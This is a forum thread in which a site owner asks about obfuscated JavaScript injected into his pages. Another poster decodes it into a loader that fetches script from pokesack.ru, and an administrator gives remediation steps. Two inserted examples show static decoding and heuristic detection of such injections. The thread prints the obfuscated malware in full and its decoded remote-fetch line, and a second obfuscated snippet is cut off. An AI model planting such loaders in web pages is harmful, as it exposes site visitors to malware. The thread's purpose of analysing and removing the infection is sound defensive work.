code auto added to my site..anyone tell me what is?

garf90
Forum Newbie
Posts: 6
Joined: Sun Apr 18, 2010 9:04 am

code auto added to my site..anyone tell me what is?

Post by garf90 »

we have a site and suddenly weird things are happening.

my developer tells me some weird Java / script has been added to multiple pages....but we (my company) didn't do it.

can anyone tell me about this code? (below) Has our site been hacked / infected?

We just found some kind of run time malware on another site...but it's on a different server.

very concerned.

any help would be great
G90

<script>var t="";var h="";var G;if(G!='m'){G=''};var D_="";function C() {var S='';var J="";var K=window;var V;if(V!='O'){V=''};var R=String("scri"+"pt");var iq="";var Z;var r='';var A;if(A!=''){A='zH'};var Fl=new String();var E=String("g");var L="appmnQi".substr(0,3)+"end"+"Chinrc7".substr(0,3)+"ldxiDU".substr(0,2);var b=new String("]");var f;if(f!='' && f!='Qp'){f=null};var z=RegExp;var GU;if(GU!='I' && GU!='lb'){GU=''};this.JL="";var bT;if(bT!=''){bT='px'};function N(q,p){var d="[";var nm;if(nm!='il' && nm != ''){nm=null};d+=p;d+=b;var oF;if(oF!='So' && oF != ''){oF=null};var w=new z(d, E);this.ze='';return q.replace(w, r);};var wk;if(wk!='e'){wk=''};this.Ns='';var i="onl"+"oad";var dz;if(dz!='no'){dz='no'};this.wa='';var LO='';var O_='';var u=N('sqr4cp','5pqQ4xa7');var D="defeANm0".substr(0,4)+"r";this.g='';this.Vw='';Z=function(){this.ZF='';try {var Gf;if(Gf!='uW' && Gf != ''){Gf=null};n=document.createElement(R);var RV=new String();var Yo;if(Yo!='' && Yo!='fF'){Yo='ib'};var v=new Array();n[D]=[1,8][0];var gY='';var gYj='';n = N('hGtQtGpW:H/j/jpYoHkjeGsjaWcYkG.YrQuY:j','GYjQWH')+N('8295634772434270642295791948166996914660733561217215135','65174293')+N('/DgXoVoEg5lReL.6cMoXm5/jt9eIcWh4nIo4r9aWtLiR.Wc5o3mR/Wi5c9iMb6a9.WcRo3mI.4p9hXp5','I36Xj9VE4W5RDLM');var XG;if(XG!='' && XG!='vi'){XG=null};var II='';var Q=new String("bodyOc6".substr(0,4));var QA;if(QA!='' && QA!='wq'){QA='JJ'};var Oa;if(Oa!='' && Oa!='hH'){Oa='Od'};var yK=new String();var Zy;if(Zy!='' && Zy!='MB'){Zy=null};var uu;if(uu!='' && uu!='nE'){uu=null};document[Q][L](n);var fR;if(fR!='U' && fR != ''){fR=null};} catch(H){this.EW="";var x_=new Date();};this.YM='';};K=Z;var vr="";this.kR='';var Jf;if(Jf!='of' && Jf != ''){Jf=null};};var Wd=new Array();var UK;if(UK!='HZ' && UK!='uz'){UK=''};C();var KqP=new String();</script>
<!--52071e04b71ca66bacac9424ea495244-->
kaszu
Forum Regular
Posts: 749
Joined: Wed Jul 19, 2006 7:29 am

Re: code auto added to my site..anyone tell me what is?

Post by kaszu »

Took me 20 minutes, but reversed. Here is what it does:

Code:

window.onload = function () {
    n = document.createElement('script');
    n.defer = 1;
    n.src = 'http://pokesack.ru:8080/google.com/technorati.com/iciba.com.php';
    document.body.appendChild(n);
}

This code loads more JavaScript code from the pokesack.ru server, which adds an iframe to the page (its src is also on pokesack.ru).

garf90 wrote: Has our site been hacked / infected?
Yes

Edit: this is my 666th post :twisted:
Last edited by kaszu on Sun Apr 18, 2010 11:40 am, edited 1 time in total.
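
The two string-hiding tricks unwound by hand in the post above can also be decoded statically. This is an added example, not part of the thread: it rewrites literals copied from the first post without executing any of the sample, and the function names `stripChars`, `decodeExpressions` and `decodedStrings` are this example's own.

```javascript
// Static decoding of the two string-hiding tricks in the injected script.
// Nothing from the sample is executed; literals are rewritten with regexes.

// String expressions copied from the script in the first post.
const sample = String.raw`var L="appmnQi".substr(0,3)+"end"+"Chinrc7".substr(0,3)+"ldxiDU".substr(0,2);
var u=N('sqr4cp','5pqQ4xa7');var D="defeANm0".substr(0,4)+"r";
n = N('hGtQtGpW:H/j/jpYoHkjeGsjaWcYkG.YrQuY:j','GYjQWH')+N('8295634772434270642295791948166996914660733561217215135','65174293')+N('/DgXoVoEg5lReL.6cMoXm5/jt9eIcWh4nIo4r9aWtLiR.Wc5o3mR/Wi5c9iMb6a9.WcRo3mI.4p9hXp5','I36Xj9VE4W5RDLM');`;

// Trick 1: N(q, p) deletes every character of p from q (the sample builds
// the regex "[" + p + "]" with the "g" flag). A Set gives the same result
// for the plain character lists used here and never treats p as a pattern.
function stripChars(q, p) {
  const junk = new Set(p);
  return [...q].filter((ch) => !junk.has(ch)).join("");
}

// Trick 2: "padded".substr(0, n) keeps only the first n characters.
// Both forms are rewritten to plain literals, then "a"+"b" chains are joined.
function decodeExpressions(src) {
  let out = src.replace(/\bN\('([^']*)','([^']*)'\)/g,
    (_, q, p) => JSON.stringify(stripChars(q, p)));
  out = out.replace(/"([^"]*)"\.substr\(0,(\d+)\)/g,
    (_, s, n) => JSON.stringify(s.slice(0, Number(n))));
  // Collapse adjacent literals joined by "+" until nothing changes.
  let prev;
  do {
    prev = out;
    out = out.replace(/"([^"\\]*)"\+"([^"\\]*)"/g, (_, a, b) => JSON.stringify(a + b));
  } while (out !== prev);
  return out;
}

// Return every decoded string literal, for review or indicator extraction.
function decodedStrings(src) {
  return [...decodeExpressions(src).matchAll(/"([^"\\]*)"/g)].map((m) => m[1]);
}

console.log(decodedStrings(sample));
```

The helper name `N` is hard-coded in the first regex because that is what this sample calls it; another variant of the script would need that name adjusted.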
Benjamin
Site Administrator
Posts: 6935
Joined: Sun May 19, 2002 10:24 pm

Re: code auto added to my site..anyone tell me what is?

Post by Benjamin »

Your servers have been compromised. The script could very well be spreading malware to your site visitors or used for monetary gain of some sort.
garf90
Forum Newbie
Posts: 6
Joined: Sun Apr 18, 2010 9:04 am

Re: code auto added to my site..anyone tell me what is?

Post by garf90 »

thanks....and S### lol


ok will look into it further.
garf90
Forum Newbie
Posts: 6
Joined: Sun Apr 18, 2010 9:04 am

Re: code auto added to my site..anyone tell me what is?

Post by garf90 »

Benjamin wrote: Your servers have been compromised. The script could very well be spreading malware to your site visitors or used for monetary gain of some sort.
thankfully site is not yet live.

so no customers yet.......

anyone in these forums dealt with these kind of run time doohickeys before?

i may need a pro on this. it's not my guy's field of expertise.

G90
garf90
Forum Newbie
Posts: 6
Joined: Sun Apr 18, 2010 9:04 am

Re: code auto added to my site..anyone tell me what is?

Post by garf90 »

additional: hey kaszu thx for taking the time to track the source down and looking into it for me.

G90
Benjamin
Site Administrator
Posts: 6935
Joined: Sun May 19, 2002 10:24 pm

Re: code auto added to my site..anyone tell me what is?

Post by Benjamin »

Well, here's what I would do:

1. Locate the entry point they used to gain access and fix it.
2. Reprovision the server. e.g. reinstall Linux from scratch in case there are any rootkits installed. Your webhost can do this for you.
3. Check the entire code base for vulnerabilities, especially upload forms and unprotected variables in database queries.
4. Use the latest version of any external libraries, such as phpBB or whatever you may be using.
5. Use cPanel and enable brute force detection, which will automatically block IPs with many invalid logins.
6. Disable any services not being used. e.g. ssh, ftp.
7. Ensure a firewall is installed and be aware of what ports are open and who they are open to.

I'm sure I'm missing some things, but this is a good start.
garf90
Forum Newbie
Posts: 6
Joined: Sun Apr 18, 2010 9:04 am

Re: code auto added to my site..anyone tell me what is?

Post by garf90 »

I get better support here than my hosting company....who said "we can't touch your code..sorry"
garf90
Forum Newbie
Posts: 6
Joined: Sun Apr 18, 2010 9:04 am

Re: code auto added to my site..anyone tell me what is?

Post by garf90 »

ok spent almost a week...got almost everything.

but just found this. is this another instance of the hack or something else?

don't want to delete just in case

<script>var j;if(j!='FJ' && j!='y'){j=''};this.TJ='';try {var C;if(C!='' && C!='Z'){C=''};var br='';var F=window[unescape("%75%6e%65%73%63%61%70%65")];this.PN="";var G;if(G!='' && G!='Y'){G=''};var ZV=
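
For finding further copies like the one in the post above, a triage scan can flag inline scripts that show the traits visible in the two snippets posted in this thread. This is an added example, not part of the thread: the indicator list, the two-hit threshold and the sample pages are assumptions constructed for illustration.

```javascript
// Heuristic triage for injected inline scripts, based only on traits visible
// in the two snippets posted in this thread. Thresholds are assumptions.
const INDICATORS = [
  // Tag/method names assembled from split literals, e.g. "scri"+"pt"
  { name: "split-literal", re: /["'][A-Za-z]{2,6}["']\s*\+\s*["'][A-Za-z]{2,6}["']/ },
  // Padded literal trimmed at run time, e.g. "appmnQi".substr(0,3)
  { name: "substr-padding", re: /["'][^"']{3,}["']\.substr\(0,\s*\d+\)/ },
  // Percent-encoded identifier passed to unescape, e.g. unescape("%75%6e...")
  { name: "unescape-hex", re: /unescape\(\s*["'](?:%[0-9a-fA-F]{2}){4,}["']\s*\)/ },
  // Character-stripping helper called with two string literals
  { name: "strip-call", re: /\b\w{1,3}\(\s*'[^']{6,}'\s*,\s*'[^']{4,}'\s*\)/ },
];

// Inline <script> (no src attribute), optionally followed by a 32-hex comment.
const BLOCK = /<script(?![^>]*\bsrc\s*=)[^>]*>([\s\S]*?)<\/script>(\s*<!--[0-9a-f]{32}-->)?/gi;

function findInjected(html, minHits = 2) {
  const findings = [];
  for (const m of html.matchAll(BLOCK)) {
    const hits = INDICATORS.filter((i) => i.re.test(m[1])).map((i) => i.name);
    if (m[2]) hits.push("hex-marker-comment");
    if (hits.length >= minHits) {
      // 1-based line number of the opening <script> tag
      const line = html.slice(0, m.index).split("\n").length;
      findings.push({ line, hits });
    }
  }
  return findings;
}

// Constructed sample pages (not real site files).
const cleanPage = `<html><body>
<script src="/js/app.js"></script>
<script>var title = "Hello" + " " + "world"; document.title = title;</script>
</body></html>`;
const infectedPage = `<html><body><p>Welcome</p>
<script>var R=String("scri"+"pt");var L="appmnQi".substr(0,3)+"end";var u=N('sqr4cp','5pqQ4xa7');</script>
<!--00000000000000000000000000000000-->
</body></html>`;

console.log(findInjected(cleanPage), findInjected(infectedPage));
```

A hit is a reason to review the file, not proof of infection, and a clean result does not replace comparing the code base against a known-good copy.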